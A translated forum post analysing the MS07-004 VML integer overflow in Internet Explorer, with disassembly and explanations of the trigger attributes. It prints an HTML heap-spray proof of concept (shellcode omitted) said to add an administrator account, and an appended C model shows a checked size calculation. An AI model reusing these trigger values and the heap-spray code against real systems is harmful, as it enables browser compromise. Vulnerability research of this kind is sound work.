by 幻影团长
A PoC for the much-anticipated MS07-004 is finally out. Until now eEye's patch-comparison tool bindiff had been refusing to work for me, and with various chores on top of that I never looked at this vulnerability properly. Today, building on the work of eong and of the person who published the PoC on milw0rm, I traced the vulnerability carefully. All debugging below was done on Simplified Chinese XP SP2 Pro.

First, the diff results others have published were produced on a Korean system, so the addresses differ somewhat on the Chinese version. That matters little: searching for imul eax, eax, 2ch in OD is enough to locate the problem. On my system it is:

Codz:

    6FF176A5  5F             POP EDI
    6FF176A6  5B             POP EBX
    6FF176A7  8B46 08        MOV EAX,DWORD PTR DS:[ESI+8]
    6FF176AA  0346 04        ADD EAX,DWORD PTR DS:[ESI+4]
    6FF176AD  85C0           TEST EAX,EAX
    6FF176AF  7E 13          JLE SHORT vgx.6FF176C4
    6FF176B1  6BC0 2C        IMUL EAX,EAX,2C              ; multiplication, integer overflow
    6FF176B4  68 01010000    PUSH 101
    6FF176B9  50             PUSH EAX
    6FF176BA  E8 3588FBFF    CALL vgx.6FECFEF4            ; malloc()
    6FF176BF  59             POP ECX
    6FF176C0  59             POP ECX
    6FF176C1  8946 14        MOV DWORD PTR DS:[ESI+14],EAX
    6FF176C4  B0 01          MOV AL,1
    6FF176C6  5E             POP ESI
    6FF176C7  5D             POP EBP
    6FF176C8  C2 0C00        RETN 0C

Because eax is not checked here, an integer overflow results: after the multiplication, the space allocated by malloc(eax*2ch) actually becomes smaller. Later a movs operation copies memory, chunk by chunk, into the buffer that was just allocated. In the process it overwrites a pointer, stored on the heap, to a virtual function in mshtml.dll.

Codz:

    call [ecx + 10h]

The ecx here happens to be something we can control.

Two key points in triggering the vulnerability have to be mentioned here.

The first:

Codz:

    <v:recolorinfo recolorstate="t" numcolors="1" numfills="1073741831">

The large integer can go in numcolors or in numfills. I put it in numfills; it makes little difference either way.

Codz:

    6FF176A7  8B46 08        MOV EAX,DWORD PTR DS:[ESI+8]
    6FF176AA  0346 04        ADD EAX,DWORD PTR DS:[ESI+4]

These two instructions pass the large integer to EAX, which is then used for eax*2ch.

The second key point:

Codz:

    <v:recolorinfoentry tocolor="rgb(90,22,64)" lbcolor="rgb(90,22,64)" forecolor="rgb(90,22,64)" backcolor="rgb(90,22,64)" fromcolor="rgb(90,22,64)" lbstyle ="13" bitmaptype="13" />

The attributes could probably be trimmed further; I did not refine them.

Here the a, b and c of rgb(a,b,c) are passed directly into memory and also end up in the later ecx, so we can control call [ecx + 10h].

Because rgb takes only three parameters, the first byte of the address can only be 0x00.

I chose rgb(90,22,64), which is in fact 0x0040165A. This address lies inside iexplore.exe.

Note: this address may differ across systems and language versions. How to make it universal is not covered here; I discussed that with eong, and it is not convenient to publish.

That address plus 10h is 0x0040166A, which points to 0x0c15xxxx. That address falls right in the middle of our heap spray, so execution jumps to our shellcode.

Below is our PoC. If everything works, it adds an administrator account named axis on your system.

This vulnerability is also nicer than the earlier MS06-055: the stack balance can be restored, so IE does not crash.

Codz:

    <!--
    MS07-004 VML integer overflow exploit
    by axis@ph4nt0m.org
    -->
    <html xmlns:v="urn:schemas-microsoft-com:vml">
    <head>
    <object id="VMLRender" classid="CLSID:10072CEC-8CC1-11D1-986E-00A0C955B42E">
    </object>
    <style>
    v:* { behavior: url(#VMLRender); }
    </style>
    </head>
    <body>
    <SCRIPT language="javascript">
    shellcode = unescape("");  // encoded payload string omitted

    bigblock = unescape("%u0c0c%u0c0c");
    headersize = 20;
    slackspace = headersize+shellcode.length;
    while (bigblock.length<slackspace) bigblock+=bigblock;
    fillblock = bigblock.substring(0, slackspace);
    block = bigblock.substring(0, bigblock.length-slackspace);
    while(block.length+slackspace<0x40000) block = block+block+fillblock;
    memory = new Array();
    for (i=0;i<350;i++) memory[i] = block + shellcode;
    </script>
    <v:rect style='width:120pt;height:80pt' fillcolor="red" >
    <v:recolorinfo recolorstate="t" numcolors="1" numfills="1073741831">
    <v:recolorinfoentry tocolor="rgb(90,22,64)" lbcolor="rgb(90,22,64)" forecolor="rgb(90,22,64)" backcolor="rgb(90,22,64)" fromcolor="rgb(90,22,64)" lbstyle ="13" bitmaptype="13" />
    <v:recolorinfoentry tocolor="rgb(90,22,64)" lbcolor="rgb(90,22,64)" forecolor="rgb(90,22,64)" backcolor="rgb(90,22,64)" fromcolor="rgb(90,22,64)" lbstyle ="218959117" bitmaptype="218959117" />
    <!-- the entry above is repeated verbatim many more times in the original post -->
    <v/recolorinfo>
    </html>

(Note: the forum may filter out the "/" characters in the code.)

BTW: produced by the 幻影 exploit research institute, guaranteed quality!

Also a plug for my blog, since it seems awfully quiet: http://blog.donews.com/axis

The blog has an XSS hole, and I keep nothing important on it, so please do not vandalize it.

This version of the exp is flawed, so anyone hoping to use it as-is will be disappointed. This post is mainly for technical research. Thanks!
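The size calculation at the IMUL EAX,EAX,2C site analysed in this post, modelled in C beside a checked version. This is an added example, not code from the original post or from Microsoft's patch; the function names are hypothetical, and which attribute is stored at [ESI+4] versus [ESI+8] is an assumption (the sum is the same either way).

```c
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>

/* Per-entry size, from the IMUL EAX,EAX,2C instruction quoted in the post. */
#define ENTRY_SIZE 0x2Cu
/* Largest entry count whose byte size still fits in 32 bits. */
#define MAX_ENTRIES (UINT32_MAX / ENTRY_SIZE)

/* Model of the unpatched sequence: ADD, TEST/JLE, IMUL.
 * Returns the byte count handed to the allocator, or 0 when the JLE
 * branch skips the allocation. Only the sign of the sum is tested, so a
 * large positive count reaches the multiplication and wraps. */
uint32_t alloc_size_unchecked(int32_t numcolors, int32_t numfills)
{
    uint32_t count = (uint32_t)numcolors + (uint32_t)numfills; /* ADD */
    if ((int32_t)count <= 0)                                   /* TEST/JLE */
        return 0;
    return count * ENTRY_SIZE;            /* IMUL keeps only the low 32 bits */
}

/* Hardened form (illustrative): reject negative fields, do the arithmetic
 * in 64 bits, and refuse any count whose byte size would not fit. */
bool alloc_size_checked(int32_t numcolors, int32_t numfills, uint32_t *bytes)
{
    if (numcolors < 0 || numfills < 0)
        return false;
    uint64_t count = (uint64_t)numcolors + (uint64_t)numfills;
    if (count == 0 || count > MAX_ENTRIES)
        return false;
    *bytes = (uint32_t)(count * ENTRY_SIZE);
    return true;
}

/* Number of whole entries a buffer of `bytes` bytes can hold. */
uint32_t entries_that_fit(uint32_t bytes)
{
    return bytes / ENTRY_SIZE;
}

int main(void)
{
    /* Attribute values from the post's v:recolorinfo element. */
    int32_t numcolors = 1, numfills = 1073741831;
    uint32_t wrapped = alloc_size_unchecked(numcolors, numfills);
    uint32_t checked = 0;

    printf("declared entries : %u\n", (unsigned)(numcolors + numfills));
    printf("unchecked size   : %u bytes (room for %u entries)\n",
           (unsigned)wrapped, (unsigned)entries_that_fit(wrapped));
    printf("checked version  : %s\n",
           alloc_size_checked(numcolors, numfills, &checked)
               ? "accepted" : "rejected");
    return 0;
}
```

The declared count and the buffer capacity disagree by many orders of magnitude, which is why the later copy runs past the allocation; a sanity cap far below MAX_ENTRIES would be a reasonable further restriction.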